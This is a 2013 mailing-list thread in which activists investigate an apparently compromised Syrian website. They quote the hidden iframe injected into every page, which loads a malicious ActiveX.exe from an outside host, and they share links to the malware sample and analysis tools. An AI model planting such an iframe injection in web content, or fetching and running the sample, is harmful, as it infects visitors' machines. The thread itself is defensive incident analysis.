Hi! I sent the malware to a couple of friends that have a setup ready. If you want to try this it might be fun: http://docs.cuckoosandbox.org/en/latest/
All the best, SiNA KheOps: > Hey, > > Le 29/01/2013 23:34, SiNA Rabbani a écrit : >> This is the malware: >>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ > > Yes, saw that too. > > However, I don't find any precise description of its behaviour. Like, > what it does, if it opens any port, sends data to a C&C or whatever. > > I have downloaded it there: > https://resources.telecomix.ceops.eu/material/malwares/ > > All the best, > >> >> >> --SiNA >> >> >> >> SiNA >> >> Rabbani: >>> holly shit: >> >>> <iframe name="I1" width="10" height="10" >>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; >> >> >> border="0" >>> frameborder="0"> >> >> >>> :/ if you are running windows don't even go there!!! >> >> >>> Andrew Lewis: >>>> I can get to this in 6 hours or so, maybe someone is willing to >>>> jump on this before then? >> >>>> -Andrew >> >>>> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote: >> >>>>> Dear Libtech, >>>>> >>>>> We just saw that the website : http://www.syrian-martyrs.com >>>>> is probably compromised. Every page of the website contains an >>>>> iFrame which links to a .exe file which is detected as a virus >>>>> by antivirus software: >>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe >>>>> >>>>> >>>>> >> >>>>> >> The fact that the HTML code is present at the bottom of each page makes >>>>> me think that the "index.php" page has been changed in a way >>>>> that makes that iFrame appear on every page of the website, >>>>> after the dynamic content. >>>>> >>>>> It also probably means that the attackers have some kind of >>>>> access to the server. My guess would be going to a PHP shell, >>>>> but I'm no expert in this. >>>>> >>>>> Any help, clue, investigation, would be very welcome :) >>>>> >>>>> Thank you, KheOps >>>>> >>>>> -- Unsubscribe, change to digest, or change password at: >>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >>>> -- Unsubscribe, change to digest, or change password at: >>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >> >> >> >> >> >> -- >> Unsubscribe, change to digest, or change password at: >> https://mailman.stanford.edu/mailman/listinfo/liberationtech >> > > > > -- > Unsubscribe, change to digest, or change password at: > https://mailman.stanford.edu/mailman/listinfo/liberationtech > -- “Be the change you want to see in the world.” Gandhi OTR: [email protected] a5dae15f45a37e9768f6deae7b54807fc4942ec9 -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
